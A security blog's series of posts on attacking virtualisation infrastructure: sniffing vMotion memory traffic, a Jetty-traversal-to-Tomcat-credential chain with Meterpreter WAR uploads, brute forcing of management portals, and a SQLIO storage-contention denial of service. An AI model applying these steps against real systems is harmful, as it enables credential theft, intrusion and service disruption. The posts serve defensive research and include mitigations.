Attacking additional virtualisation infrastructure

10 02 2015

I should start by stating that in almost all documents regarding live migration, High Availability (HA) and Fault tolerance configurations, it is stated that these networks should be placed on isolated networks that are not shared or accessible by unauthorised individuals. In an article by (Siebert, 2011) it specifically states to:

“Keep management and storage traffic, for instance, on a physically isolated network that’s away from the regular VM network traffic”

However, this does not diminish the argument that this information is still being moved inside the environment and should these guidelines be overlooked or the networks breached, the consequences of what can be achieved can be unintelligible to staff only familiar with traditional methods.

Live migration traffic

Live migration can be used to move machines between hosts that are located in the same blade chassis, across campuses and even over different continents, with minimal downtime (Travostino, et al., 2006). The action of preforming a live migration from one host to another is a common feature found in many of the larger VMMM such as XEN and VMware. The act of moving a machine across hosts in the VMware environment can be a manual or automated process when combined with other features such as DRS and DPM (Distributed Power Management). While explanations of the DRS feature is discussed in numerous earlier posts, DPM enables vCenter to automate the movement of machines off hosts during quiet periods of usage, allowing them to be powered down thus improving power consumption. It is my personal option that live migration is one of the more intriguing introductions of virtualisation, as the information that is located in RAM contains such important information.

Using the test environment I will demonstrate what is possible when access to the vMotion network is obtained. For this example a vMotion has been initiated specifying that VM1 on ESX1 is to be migrated – and only the host portion is required to move and not the datastore. The VM will be moved to the only other host in the cluster, ‘ESX2’. To understand how this process is vulnerable to attacks I will first breakdown the processes of the steps involved in this operation (Kutz, 2007):

  1. The request is made specifying the VM and which host it will be moved to.
  2. All of the RAM of VM1 is copied over the vMotion network to ESX2, any active changes happening during this time on ESX1 are written to a memory bitmap on ESX1.
  3. VM1 is quiesced on ESX1 and the memory contained in the bitmap is copied over the vMotion network to ESX2.
  4. VM1 is started on ESX2 and access to the VM are sent to the instance on ESX2.
  5. Remaining memory from VM1 is copied from ESX1, while memory is being read and written from VM1 on ESX1.
  6. Once successful, VM1 is unregistered on ESX1 and the task is complete.

In figure 1 we see a basic visual representation of the process in the test environment. For demonstration purposes and ease of result display, I have a separate vMotion network that uses a hub to connect the two machines. This will allow me to sniff traffic without having to perform an additional attack such as MiTM or configure port mirroring, port spanning, SPAN, RSPAN etc.

Basic visual representation of the process of a machine being migrated to another host in the test environment

Basic visual representation of the process of a machine being migrated to another host in the test environment

In the virtual machine that will be moved, I have written information into a text file but not saved it to disk, so that we can be sure it will be located in the machines memory. This information in the example is a representation of a secure document containing a username and password. This text file and content are shown in Figure 2.

An unsaved text file that has been written on the running virtual machine

An unsaved text file that has been written on the running virtual machine

I now initiate a vMotion request and starts a packet capture on the vMotion network using Wireshark. The network card is configured in promiscuous mode, to allow it to capture all of the packets being transmitted on the network. After the vMotion process has finished and the capture stopped, I am able to follow the TCP stream of the communication that took place between the two hosts and view the information in a searchable form. As is shown in Figure 3, the information transmitted in the document is viewable in clear text, although separated by some punctuation

A TPC stream of communication between the two hosts showing the notepad content

A TPC stream of communication between the two hosts showing the notepad content

Although this example used a notepad document to demonstrate the ability to sniff data, there are much greater risks to consider when addressing passive snooping attack on migration traffic. Microsoft stores LM authentication hashes for active sessions in memory (Pilkington, 2012) in all current versions of Windows. As a result, should a passive snooping attack take place while a machine is locked or logged on, the LM hash will also be viewable in the capture. Windows LM hashes are also reversible back into the user’s original password using online services such as (OS – Objectif Securite, 2012) and other hash cracking tools. Finally, and possibly of most concern, is the accessibility of encryption keys. Even when full disk encryption is used to secure data, the keys (after initial user input) are cached in memory by the operating system. On traditional hardware this is considered the safest place, as volatile memory is erased quickly once the power is taken away. This is something that usually requires physical access to the machine to exploit, unless the machine is already infected. It is now possible to sniff the encryption key during a live migration to obtain the encryption hash.

Live migration attacks are not only vulnerable to sniffing attacks. In a paper written in 2007 by (Oberheide, et al., 2007), the researchers describes a number of attacks that are possible on live migration traffic. In the paper the researchers discus three ‘classes’ of threats that can be used against live migration environments:

  • Control plane
  • Data Plane
  • Migration Module

Control plane attacks

Control plane attacks target the mechanisms that are employed to initiate and manage the migrations within the infrastructure manager. While there were no active attacks in the paper, the theory behind the attacks is still relevant and should be considered in a risk analysis exercise. The examples in the paper that (Oberheide, et al., 2007) highlights, demonstrate how successful attacks to the control plane could result in:

  • The migration of machines onto illegitimate hosts that are owned by the attacker.
  • Mass migration of a large number of machines, thus overloading the network and causing disruption to service.
  • Manipulating the resources management for hosts in a DRS style environment, so that hosts are not evenly distributed and overwhelm single resources.

Data plane attacks

Data plane attacks are threats that take place on the networks on which the migrations are situated. The passive snooping attack that was demonstrated previously is one of the attacks that are briefly mentioned in the paper. The second attack on the data plane class is described as ‘active manipulation”. As the name suggests, active manipulation is when data is changed during the migration of the machine. Although in the paper (Oberheide, et al., 2007) introduce their custom tool Xensploit for preforming this attack, it is merely the collection of existing attacks collated into one tool for ease of use. The attack works by using MiTM characteristics to intercept traffic between the two hosts and manipulating sections of the traffic (RAM) during transit. In the example of the Xensploit software in the paper (Oberheide, et al., 2007, p. 4) showed how the attack could be used to establish an SSH (Secure Shell) session to a machine configured to only allow connections from authorized sources. Using Xensploit they were able to manipulate within the object code of the SSHD process to add their key as an authorised source, thus allowing them to SSH once the new instance had completed its migration.

Migration Model attacks

Lastly, although these attacks are included in the paper, I feels that this section falls under one of my other previous topics of the hypervisor rather than on live migration. The paper briefly covers attacks that exploit vulnerabilities in the migration models – that are part of the VMM (virtual machine monitor).

Combining attacks

Gaining access to any of these attack classes should be considered a high risk to security staff, although with access to just one of the vectors, it may still not be possible for an attacker to target a specific machine depending on its physical location. If a combination of the attacks were available, the attacker would be able to leverage them to better achieve control of the environment. An example of this is in the case of data plane class attacks. These attacks are only useful if the target machine is being migrated during the period of capture. In environments where features such as DRS and DPM are not in use, it is possible for machines to stay fixed to a host for a considerable period of time. If the attacker was able to utilize an attack at the control plane they would be able to trigger the migration of the necessary machines for the attack to then take place at the data plane.

Shortly after the paper was released, VMware’s (Wu, 2008) comments on this attack:

“Although impressive, this work by no means represents any new security risk in the datacentre… Rather, it a reminder of how an already-compromised network, if left unchecked, could be used to stage additional severe attacks in any environment, virtual or physical.”

While I can appreciate what (Wu, 2008) is saying, I must disagree that these types of attacks are comparable to physical environments. Data-In-Transit on physical systems do not tend to include such sensitive information. It is also better understood in traditional systems that unsafe protocols such as email and ftp should not be used to transfer confidential information. While the previous example required physical access to the vMotion network, it is also possible to access this data remotely through misconfiguration, access to the management interface or manipulation of virtual infrastructure.

Wu, W., 2008. VMware Security & Compliance Blog. [Online] Available at: http://blogs.vmware.com/security/2008/02/keeping-your-vm.html

Siebert, E., 2011. Five VMware security breaches that should never happen. [Online] Available at: http://searchvmware.techtarget.com/tip/Five-VMware-security-breaches-that-should-never-happen

Travostino, F., Daspit, P. & Gommans, L., 2006. Seamless live migration of virtual machines over the MAN/WAN. Future Generation Computer Systems – IGrid 2005: The global lambda integrated facility, 22(8), pp. 901-907.

Kutz, A., 2007. How to obtain, configure and use VMotion and how VMotion works. [Online]
Available at: http://searchvmware.techtarget.com/tip/How-to-obtain-configure-and-use-VMotion-and-how-VMotion-works
Pilkington, M., 2012. Protecting Privileged Domain Accounts: LM Hashes — The Good, the Bad, and the Ugly. [Online]
Available at: http://computer-forensics.sans.org/blog/2012/02/29/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly

Oberheide, J., Cooke, E. & Jahanian, F., 2007. Empirical Exploitation of Live Virtual Machine Migratio. [Online]
Available at: http://www.eecs.umich.edu/techreports/cse/2007/CSE-TR-539-07.pdf

Advertisements




Post exploitation on management interfaces

7 11 2014

Once an attacker successfully gains admin access to a particular element of the management infrastructure, what is possible? In traditional networks, the compromise of an ‘Enterprise admin’ or ‘root’ would be a worst case scenario. Using this account, an attacker could logon to servers, delete accounts and data/policies and affect services running on those servers. Although without pre-defined scripting, all the actions would need to be done manually on each server, which of course would have time implications. The attack would be effective, but once identified, action could be taken on uncompromised servers and machines not connected on the network by a domain trust would remain unaffected.

Now consider a fully virtualised environment that is fully managed by a single management interface (which, from the author’s experience, is not uncommon). Should an attacker obtain admin access to a management interface, then the implications are much greater.

Data centre management system (vCenter, SCOM)

If an attacker was to gain admin access to the management software that controls the environment, the implications from a defensive point are devastating. From inside the console they would be able to delete configurations, virtual switches and even full machines from both a management and disk perspective. What is often done in large environments is to create a disaster recovery environment in another location of the campus/business, so in the event of a loss of service in one location, the mirror environment could be used. It is not uncommon for both locations to be managed by the same management software as it allows increased replication and failover. While this may increase availability and functionality, it also means that gaining access to the one system could potentially allow an attacker to erase an entire site including any recovery environment.

While it may not have the same initial impact, there are also a number of other actions that could be completed by the attacker once access to a management interface is gained. Misconfigurations in the way the hardware performs could go unnoticed for a long period of time, but still cause huge disruption to services that may be harder and more time consuming to identify. There are also persistent attacks that could be configured for snooping, such as placing switches into promiscuous mode in order to preform undetected information gathering. It is also possible from the interface to copy full machines offline and boot them up using consumer tools such as VMware Player (VMware, 2012) for analysis and offline attacks (Siebert, 2011).

Storage interfaces

While there are only so many actions that can be done as a result of gaining access to the interfaces that manage the storage, they are equally disruptive. Entire disk arrays can be

remotely wiped, resulting in the loss of multiple servers and data stored on that storage in one action. Disks could also be misconfigured to affect performance on all machines operating on that array

Hardware management (iLO, DRAC, RSA, On-board Administrator)

With access to the hardware management interface an attacker would be able to perform physical actions on the infrastructure remotely. These control the hardware that manages the hardware of the hypervisors, the interface fabric, power and cooling on blade systems. Although most of the actions from here are reversible, they still present a single targetable area that has the potential to severely affect service for a considerable period of time.

 

Siebert, E., 2011. Five VMware security breaches that should never happen. [Online] Available at: http://searchvmware.techtarget.com/tip/Five-VMware-security-breaches-that-should-never-happen





Attacking management interfaces

29 09 2014

The management interfaces and everything that is incorporated into that software is, in the author’s opinion the most problematic area in virtualisation security today. There have been numerous attempts over the last few years to demonstrate how management interfaces can be breeched. The majority of these attacks are general attacks that use pre-existing attack methods such as brute forcing, MiTM (man-in-the-middle) and the numerous flaws with the PKI infrastructure. There are multiple proven attack methods available for exploiting management interfaces and below are descriptions of some of these attacks that have been discovered by researchers.

In an online blog (Mluft, 2011)  talks about how a brute force attack is achievable on the Amazon Web Services (AWS) portal by leveraging existing hacking software tools. In the attack (Mluft, 2011) demonstrated how it is possible to determine a successful logon using the exemplary payloads in the Burp Suite (Burp Suite, 2012). The use of the burp suite in this example is to simply automate the process of attempting logins to the interface. The payload in the software is also able to identify failed login attempts to the portal by returning a HTTP status code of 200 (Network Working Group , 1999). A correct password attempt is identified by a returned HTTP status code of 302. Using the documentation provided by Amazons services in relation to password policies (Mluft, 2011) created an appropriate wordlist and used the burp suite to attempt all the possible permutations. After 400,000 attempts the attack was paused and the results purged for the 302 status code. The code was found and also shown alongside was the value and the password attempted. This gave the attacker the username and password for the administration of all servers managed by that account. It should be noted that all of these attempts were originated from one IP address without the account being locked-out or subject to any account throttling.

As discussed earlier my earlier blog artical regarding the hypervisor, the Virtualization Assessment Toolkit (VASTO) has been developed to exploit multiple weaknesses, predominantly in the VMware family. As well as the identification module that returns the exact version of the server, it includes numerous attacks on virtual systems including a specific VMware brute forcing module, which mimics the attack on the AWS portal by (Mluft, 2011). One of the main contributors to the VASTO project (Criscione, 2010) demonstrated a number of the different functions found in VASTO at Blackhat USA 2010.  Although (Criscione, 2010) demonstrated how VASTO can be used at multiple layers of the virtual stack (Client, Hypervisor, Support, Management and internal), the majority concentrated on the management portion. (Criscione, 2010) confirms that although the (VMware, 2012) hardening guide recommends segmentation of management networks, these recommendations are often ignored and left situated on the same networks as traditional servers.

These servers that manage the entire fabric of the infrastructure have multiple attack vectors – from the operating systems they are installed on to the web services running the interfaces. Vulnerabilities in any one of these platforms can potentially jeopardise the security of an entire environment and should be taken very seriously.

The other element used in the VASTO modules which can target the management portion of the virtual infrastructure uses target flaws in the VMware components and implementation to expose threats in the infrastructure. One of the exploits that is included in the VASTO suite that best demonstrates how multiple components in these systems can be used for exploitation, originates via a flaw in the Jetty (Eclipse, 2012) web server that is used by vCenter Update manager. In the author’s opinion, this attack signifies how the complexity and code overhead that these management servers introduce, make securing virtual environments in an efficient manner, one that needs to be understood and prioritised. I will briefly give a breakdown of this attack to highlight the multiple elements that were used to complete the attack.

The Update Manager component of the vSphere suite is designed to secure the environment by automating the patching and updating process of hosts that fall under its management scope. However, (Criscione, 2010) recognised that the update manager requires a version of Jetty web server to operate. This is an additional component that is added to the total footprint of the management server. The version of Jetty installed prior to version 4.1 u1 (update 1) of the update manager was a version vulnerable to a directory traversal attack (Wilkins, 2009), which allowed attackers to view any files on a server that the Windows SYSTEM user has privileges. Consequentially vCenter stored a file on the server called “vpxd-profiler-*” which is a file used by administrators for debugging purposes. In this extensive file the, SOAP Session ID’s of all the users that have connected to that server are contained. With this ID the vmware_session_rider module, found in the VASTO toolkit, acts as a proxy server to allow the attacker to then connect through it into the vCenter server using the selected administrator SOAP ID. Once this is completed, the attacker is able to create a new admin credential within vCenter to ensure future access.

Another example of how different elements of the management interface could be used to gain access to vCenter is through VMware’s use of Apache Tomcat technology (The Apache Software Foundation, 2012). When navigating to a vCenter server through a web browser one is presented with the standard vSphere “Getting started” screen as is shown in figure 1

Web browser connection to vCenter server

Web browser connection to vCenter server

Connection to that same servers IP address, but specifying the default tomcat Tomcats index page port of “8443” over an SSL connection shows further information, including a link to login as the “Tomcat manager”. This page is shown in figure 2

The web interface seen when you navigate to vCenter with a port of 8443

The web interface seen when you navigate to vCenter with a port of 8443

In VMware version 4.1 there is a user named “VMwareAdmin” that is automatically added to the Tomcat server, which has full admin rights to the Tomcat service. In the earlier versions of VMware, the password for this admin account was 5 characters long starting with 3 uppercase, 1 number and one lowercase. This leaves an attacker with a number of options for an attacking perspective. The most obvious is to brute force the credentials with a compatible tools or script such as the Apache tomcat brute force tool (Snipt, 2011). A second (and more sophisticated attack) would be to use the folder traversal vulnerability introduced by the Jetty service to gain read access to the server. From here the attacker could navigate to the “tomcat-users.xml” file (C:\Program Files\VMware\Infrastructure\tomcat\conf) as shown in Figure 3, which is an XML file found in VMware 4.1 and which shows the clear text credentials of the account.

(left) The tomcat-users.xml file showing the username and password of a default admin account (Right) tomcat manager login prompt

(left) The tomcat-users.xml file showing the username and password of a default admin account (Right) tomcat manager login prompt

Using this access, an attacker is able to control elements of the web service with admin rights. As shown in Figure 4, one is able to change a number of settings through the tomcat interface, including the ability to upload custom WAR files, which can be created using Metaspolit to upload meterpreter payloads to the server.

Logged in to the tomcat manager using the credentials found on server

Logged in to the tomcat manager using the credentials found on server

Although some of the attacks using the VASTO toolkit are specific and use vulnerabilities that have almost all been patched by VMware (at the time of writing), the management interfaces are still vulnerable to more general network attacks that are not as fundamental to secure as simply applying a patch or updating to the newest version. As is explained briefly in by post on hypervisors, access to these interfaces are vulnerable to MiTM attacks and the implementations dependence on a highly insecure certificate/PKI model. These vulnerabilities are not directly the responsibility of the vendors, but certainly nothing has been done by them to address this issue.

I will not be explaining the process of how MiTM attacks and flaws in the certificate infrastructure can be used to capture login credentials, as this a fundamental part of security and has been covered on numerous occasions by multiple sources (Irongeek, 2012) (Schneier, 2011). I have also written about the overarching problems with the certificate model and how it can be bypassed by in a blog post from 2011.

 

Mluft, 2011. The Key to your Datacenter. [Online] Available at: http://www.insinuator.net/2011/07/the-key-to-your-datacenter/

Criscione, C., 2010. Blackhat 2010 – Virtually Pwned. USA: Youtube.

Wilkins, G., 2009. Vulnerability in ResourceHandler and DefaultServlet with aliases. [Online] Available at: http://jira.codehaus.org/browse/JETTY-1004

Irongeek, 2012. Using Cain to do a “Man in the Middle” attack by ARP poisoning. [Online] Available at: http://www.irongeek.com/i.php?page=videos/using-cain-to-do-a-man-in-the-middle-attack-by-arp-poisoning

Schneier, B., 2011. Schneier on Security. [Online] Available at: http://www.schneier.com/blog/archives/2011/09/man-in-the-midd_4.html





Mitigation techniques for shared hardware

4 06 2014

The concept of mitigation techniques to reduce the likelihood of shared hardware attacks are similar to that of the hypervisor techniques in terms of determining which machines have access to which host. To ensure isolation of the hosts, the same measures can be used as described in an earlier post regarding hypervisors, such as using DRS groups and in larger cloud environments specific hardware-conscious options such as the ‘Dedicated VDC’ in VMware’s vCloud Datacentre. While host isolation techniques can be achievable using these methods, they only address physical component allocation at the host portion such as RAM, CPM, mezzanine cards/NIC’s etc. What these do not address however is the issue of shared storage and blade infrastructures.

Where ‘in house’ storage is concerned, separate groups of arrays could be used to reduce the implications an attack could have due to what systems they could affect. In the same way that DRS groups were created in the hypervisor demonstrations, machines could be grouped by security rating so that less secure machines are not placed on the same array as other higher valued machines. This mitigates the risk of a less secure system threatening the performance of a group of higher target machines due to vulnerabilities found in the VM. With this measure however there is also the consideration that in doing so, you are creating one high target area that could be attacked, affecting all the core services. The increase to security that segmentation of disk arrays creates unfortunately has an adverse effect on resource efficiency, as the smaller the array the higher the disk overhead (Shangle, 2012), (International Computer Concepts, 2012).

There are options within some VMMM’s (certainly within vCenter) to evenly distribute and limit the amount of IOPS a single machine is able to request. This can be set at the machine level using the resource allocation section, and set based on a per machine level. Within the vCenter suite ‘share values’ can also be set to individual machines and automatically limit disk allocation, should disk latency reach a certain threshold. The latter option is not included into the core functionality of the vSphere suite and therefore is at an additional licence cost. In the figure below you will see that the limit has been set to 1000 IOP’s for the ‘Public-Web’ virtual machine. While this option does stop the ability for one machine to overwhelm the entire storage, it can also unnecessarily restrict genuine requests from VM’s, should they experience a higher than normal workload.

Using the free IOPs limiting ability in vCenter

Using the free IOPs limiting ability in vCenter

 

The additional licencing cost of VMware’s ‘Storage I/O Control’ allows one to associate a share value with machines rather than a set resource threshold. A latency figure can be set on a LUN and should that threshold be reached vCenter will ensure that the machine with the highest costing will get the specified disk allocation required. To protect internally hosted environments, core servers would be given the highest costing while less importance, more vulnerable machines would be allocated lower figures to ensure that key functions of the business continue to function, should this type of attack take place.

In circumstances where these options are not available in the VMMM, such as is the case with the standard Hyper-V manager, which “does not have any built in mechanism to dynamically or even statically control storage I/O”  (Berg, 2011), alternative solutions will be required.

Avoiding sharing is undoubtedly the simplest option when securing high risk, mission critical systems. The challenge becomes more complicated when considering public cloud environments. Avoiding storage contention due to noisy or malicious neighbours on a public cloud service is one that should be seriously considered before any cloud adoption takes place. Many big companies are now using the public cloud infrastructure to host their services. Amazon has had impressive adoption rates with online services including Netflix (Buisiness Wire, 2010), Reddit (Berg, 2010), MySpace (High Scalibility, 2010) and many others now opting to migrate their entire business onto Amazons EC2/EC3 infrastructure.

One example of how resource contention can be avoided within a public cloud was undertaken by Netflix’s (Cockcroft, 2011), who extensively researched the inner workings of Amazons EBS (Elastic Block Store) so that they could best utilize the service and not be affected by neighbours’ disk requirements. (Cockcroft, 2011) discovered that Amazons EBS volumes were between 1 GB and 1Tb in allocated size and it was deemed that allocating volumes in 1TB blocks to the Netflix servers regardless of their actual storage requirements avoids the likelihood of co-tenancy and, in turn, storage contention. Amazon makes this a more feasible option to determine the sizing of disks as the whole EC2 service has a large amount of information available, especially when compared to other providers. Having access to this level of information should be a key consideration when planning any cloud migration.

The threat of an exploit at the blade hardware layer is an extremely difficult attack to mitigate against and one that cannot be achieved without taking unrealistic precautions that undermine the reasoning and benefits of a blade system altogether. While there may be scope within the larger blade systems to use separate physical interconnect modules to ensure that secure and insecure machines use different routes in and out of the enclosure, there is still the backplane of the chassis, which is completely shared among all hosts. As mentioned prior, hardware attacks at this layer of the system would most likely be DOS attacks rather than disclosure and have yet to be demonstrated.

Shangle, R., 2012. Level 0,1,2,3,4,5,0/1. [Online]  Available at: http://it.toolbox.com/wiki/index.php/Level_0,1,2,3,4,5,0/1

Buisiness Wire, 2010. Netflix Selects Amazon Web Services To Power Mission-Critical Technology Infrastructure. [Online]  Available at: http://www.thestreet.com/story/10749647/netflix-selects-amazon-web-services-to-power-mission-critical-technology-infrastructure.html

Cockcroft, A., 2011. Understanding and using Amazon EBS – Elastic Block Store. [Online] Available at: http://perfcap.blogspot.co.uk/2011/03/understanding-and-using-amazon-ebs.html

Berg, . M. v. d., 2011. Storage I/O control for Hyper-V. [Online]  Available at: http://up2v.nl/2011/06/20/storage-io-control-for-hyper-v/





Attacking shared hardware used for virtualisation

5 05 2014

There are a number of conjectural and proven attacks that involve the exploitation of shared hardware. One of the more relevant attacks that threaten virtual environments is the ability to degrade the performance of other machines by causing an unpredictable strain on the shared hardware. This could be possible either by taking control of a virtual machine in the environment through an existing software exploit or in the case of a cloud provider, simply by purchasing one. Amazon has multiple security measures in place to deal with inside attacks on their Amazon Web Services (AWS) platform, although with the pricing of a Microsoft Windows instance costing as little as $0.115 per hour, there is a very low cost entry for attackers.  While one moderately powered machine would not be able to affect numerous neighbouring client’s ‘performance’ on Amazon’s infrastructure, this low entry figure demonstrates how little it would cost to rent multiple instances for a clustered attack.

Although not primarily considered a security issue, resource contention is a major issue within virtual systems, especially when operating in multi-tenant environments. The term “noisy neighbours” is used to describe virtual instances of a machine sharing the same host or storage as another and affecting its performance. Problems caused by noisy neighbours or resource intensive virtual machines are typically due to either a misconfiguration or simply from being unfortunate enough to be placed on the same hardware as other high performance machines. However, when considering this issue from a security perspective, if an attacker is able to place a number of machines on the shared hardware as a competitor’s machine, they have the ability to degrade the performance. There has been prior research conducted into determining the internal mappings of a machine within large cloud infrastructures. One paper entitled “Hey, You, Get Off of My Cloud!”  by (Ristenpart, et al., 2009), the authors use the Amazon EC2 service as their environment to test the ability to map the internal location of machines and discuss how this information can be used to construct machines that co-reside with specific targets.  While the specific methods involved in determining the internal location of a machine in large cloud environments are out of scope of this article, in the paper “Hey, You, Get Off of My Cloud!” (Ristenpart, et al., 2009) a description of how an accurate mapping can be achieved using “timestamp fingerprinting” and “Cache-Based Detection” is given.

Studies often measure the impact that noisy neighbours cause on co-residing tenants by analysing RAM, CPU or network usage. While these are relative elements that are affected, one major drawback in only measuring these aspects is that disk activity, such as the IOPS (Input/Output Operations Per Second) on to shared storage is not taken into consideration. This can be one of the more difficult elements to measure, as storage arrays can differ greatly in both size and performance, even within the same provider. Misbehaving disk activity can also be much more erratic in its usage, especially when compared to RAM, which tends to gradually increase rather than produce the spikes in performance that are seen in IOPS.

One attack that would be possible using shared storage would be to use the mapping techniques discovered by (Ristenpart, et al., 2009) to place a group of machines on the same storage array or LUN as a target before generating high I/O. If the activity generated was high enough, contention for disk access would be experienced by all machines using that storage and as a result, machines become noticeably slower, due to the disk latency created. Amazon EC2 does not limit the amount of I/O that a machine can use, as it is a chargeable resource that is billed based on usage to the owning customers account. These charges would obviously not be a problem for an attacker using a stolen credit card for example. While there are a number of articles (Cockcroft, 2011) about the consequences of sharing storage with other busy or malfunctioning VM’s, the author has not found any documentation on using heavily crafted IOPS as being a documented or recognised attack.  A demonstration of how this attack could be carried out is shown later in this section.

Attacks that use shared hardware as a vector are not only capable of producing new attack vectors that affect the availability, but all three aspects of the Confidentiality, Integrity, Availability (CIA) Triad (Perrin, 2008). The confidentiality of machines on virtual systems should also be a consideration before the adoption takes place.  While some of the attacks that surround exploiting the confidentiality and integrity portion of the CIA Triad using shared hardware can fall on the academic side of the spectrum rather than active exploits, these concepts should at least be taken into consideration, especially by high risk targets.

One example of how a shared CPU can be manipulated is (Phil, 2012) demonstration of how two machines running on the same host can communicate with each other without using any networking protocols. This types of attack is typically knows as side-channel attack and has been a known issue for a number of years (Page, 2003), (Osvik, et al., 2005).  In (Phil, 2012) ‘virtualisation specific attack’, there are a number of pre-requisites required for the attack to be successful. These include both of the virtual machines requiring the same number of processors and running on the VMware platform with unlimited CPU resources. However, once all of the appropriate elements are in place (Phil, 2012) was able to send data bits from one VM to another over the CPU by oversubscribing the hardware. While these attacks may be an extremely niche and inefficient with transfer rates being as slow as 0.5bits/sec (depending on the noise of other machines on that host), it does show the principals of how attacking virtual machines at this layer is possible.

An area that the author would be interested in investigating further (due to being unable to find any research that has been undertaken in the area) would be the security implications of shared hardware involved in blade environments. The most effective way to ensure the integrity of an environment is to adopt the ultra-cautious approach of disconnecting machines from the internet and any other connecting networks. This is known as an ‘air-gap’, and is typically used to secure high target environments such as SCATA (supervisory control and data acquisition) systems. Blade systems such as PowerEdge M1000e offer “compelling operational benefits, such as improved cabling, rapid hardware provisioning, high compute density, energy-efficient design and increasing management automation”, which can offer enough resources to individually power an entire large organisation or business. Using VLAN’s, multiple networks can be hosted within the one enclosure including Demilitarized Zones (DMZ) and Virtual Desktop Infrastructures (VDI). While research has been done into the sharing of components such as RAM, CPU etc., elements of the blade environment such as the chassis backplane and connection fabric into the system pose an equal if not greater risk. If malicious software was able to infect the software that manages these physical elements of the system they could potentially monitor and affect the integrity of information to and from any virtual machine or host.

As discussed earlier, when placed on the same storage array as a number of machines, an attacker may be able to affect the performance of other machines by requesting large amounts of disk I/O on a shared storage array. To demonstrate the plausibility of this attack the author conducted a simulation of two attack machines and one target machines that were placed on the same storage array. I will post a full description of the simulation in a separate posting. To demonstrate the disruption caused by this attack, the experiment will be using the built-in monitoring tool ‘esxtop’. The figure indicated under the GAVG/cmd column is the figure that will best demonstrate the impact the attack has on the storage array. This figure identifies the “response time as it is perceived by the guest operating system” by adding the “average response time in milliseconds per command being sent to the device” (DAVG/cmd)  to “the amount of time the command spends in the VMkernel” (KAVG/cmd).

The simulation used three machines to demonstrate this process, two representing the controlled machines of the attacker and one the victim machine. Both of the attacking machines are running a freely available Microsoft SQL I/O stress testing/benchmarking utility named “SQLIO”. To simulate high I/O the author initiates the utility using a snippet of the parameters shown below.

“sqlio -kW -s10 -frandom -o8 -b8 -LS -Fparam.txt

sqlio -kR -s360 -frandom -o8 -b8 -LS -Fparam.txt…”

 The ‘frandom’ perimeter in the SQLIO utility generates random reads and writes rather than sequential, as random disk activity is known for being more intensive on storage devices (Kelkar, 2011). This resulted in the number of read operations on one of the attacking machines to rise to a consistent rate of 5323.41 commands per second, causing the GAVG to rise from zero to 82.31 milliseconds on the attacking machine and from zero to 47.41ms on the victim machine. While these contention results fluctuated during the tests, the GAVG was consistently above 30 ms on both one of the attacking machines and the victim machine during the test as is shown in Figure 1 and on the graph in Figure 2.

Statistics for each machine during the I/O tests

Figure 1 – statistics for each machine during the I/O tests

The average figures that were shown by the monitoring software also demonstrate the high latency that was experienced by each machine. To demonstrate the impact that the attack has on the machines response time (GAVG), Figure 2 shows the average GAVG figure that was reported by each VM before the script is run and then for the following 5 minutes. The graph shows that the average GAVG before the script was run was instant at 0ms, but once the script was initiated this figure increased, peaking at around 82ms. The average response time for the victim machine throughout the 5 minute period was 46.77ms, which is 36.77ms above that recommended by VMware.

Figure 9 - Graph showing the average millisecond GAVG response time reported for each guest OS during the testing

Figure 2 – Graph showing the average millisecond GAVG response time reported for each guest OS during the testing

This graph demonstrates that it is possible for an attacker with machines located on the same shared storage array as their target, to be able to adversely affect the performance of other machines through over subscription of the hardware.

 

Sources:

Ristenpart, T., Tromer, E., Shacham, H. & Savage, S., 2009. Hey, You, Get Off of My Cloud: Exploring Information Leakage in Third-Party Compute Clouds. [Online]  Available at: http://cseweb.ucsd.edu/~hovav/dist/cloudsec.pdf

Cockcroft, A., 2011. Understanding and using Amazon EBS – Elastic Block Store. [Online]  Available at: http://perfcap.blogspot.co.uk/2011/03/understanding-and-using-amazon-ebs.html

Perrin, C., 2008. The CIA Triad. [Online]
Available at: http://www.techrepublic.com/blog/security/the-cia-triad/488

Osvik, D. A., Shamir, A. & Tromer, E., 2005. Cache Attacks and Countermeasures: the Case of AES. Rehovot: Department of Computer Science and Applied Mathematics.

 





Attacking the hypervisor

27 11 2013

The hypervisor has the disadvantage of being potentially attacked in one of two ways, from either the network layer or from the host running on that hypervisor. The default behaviour of a hypervisor on a network is to respond to connections through standard TCP/IP, much the same as other desktop machines, devices and infrastructure. This results in the hypervisor being locatable on the network and consequently susceptible to traditional network enumeration attacks such as Nmap (nmap.org, 2012) and Nessus (Tenable, 2012). While enumeration tools are primarily used as a discovery mechanism, they are often able to extract further information about a system by analysing characteristics and information returned by the host. An example of this technique using the currently most utilised enumeration software (Nmap) would be by specifying the ‘–O’ switch, which compares the host’s packet response against a large database of software. Once this extra information about the host has been identified, additional approaches can be used to cross-examine the hosts further to identify attributes such as patch levels and service packs. Depending on the software that is found, using these approaches the attacker is then able to determine the appropriate CVE (Common Vulnerabilities and Exposures) that the host may be vulnerable to. After the vulnerabilities have been identified, the attacker is able to exploit the system using the exploit and insert a payload to further control the host and maintain access. Current examples of software that can be used to exploit systems and insert malicious payloads are Metasploit (Metasploit, 2012) and CORE Impact (Core Security, 2012). This method of enumeration and exploitation will already be familiar to security staff responsible for scanning traditional clients as it is identical.

It is the second method used to attack the hypervisor from the guest or virtual machine that is much more dangerous and an unfamiliar concept, especially for companies invested in the cloud computing or hosting servers in large datacentres.

The term virtual machine (VM) escape is the concept of breaking out of an isolated VM in order to execute malicious code on the host. There have been a number of vulnerabilities on both Type 1 and 2 hypervisors that demonstrate this concept of escape (CVE-2009-1244, CVE-2011-1751, CVE-2012-0217 (Xen, 2012), CVE-2012-3288). While the danger of ‘Type 2’ hypervisor escape is still a threat, the implications of breaking out of a guest, running on an enterprise ‘Type 1’ hypervisor such as ESXi or the Xen hypervisor would be much greater due to the environments that they are often employed in. In traditional networks, security can often be achieved through the segmentation of networks into either physical or virtual networks. This segmentation is still applicable within virtual networks; however this only offers security at the network layer, rather than this new layer of ‘guest–host’ exploitation. While this might sound like an unlikely threat, due to HA features found in VMMM such as VMware’s DRS (Distributed Resource Scheduler) the movement of machines across hypervisors is often determined by the management server rather than by a human. That is unless specified rules are created by the administration. This dynamic movement of virtual machines has the potential to result in an unpatched, publically addressable server being hosted on the same hypervisor/hardware as domain controllers and other high value target machines. This threat is certainly a cause for concern when considering mid to large size networks hosting tens to hundreds of machines within the same infrastructure separated by VLAN’s. The implications and likelihood of this attack is greatly increased when considering multi-tenant public cloud infrastructures. The topic of how hackers could potentially start to rent hosted machines on public clouds to attack other machines will be covered at a later date, but in the authors opinion this could become an actual threat that needs to be considered during a company’s risk analysis process.

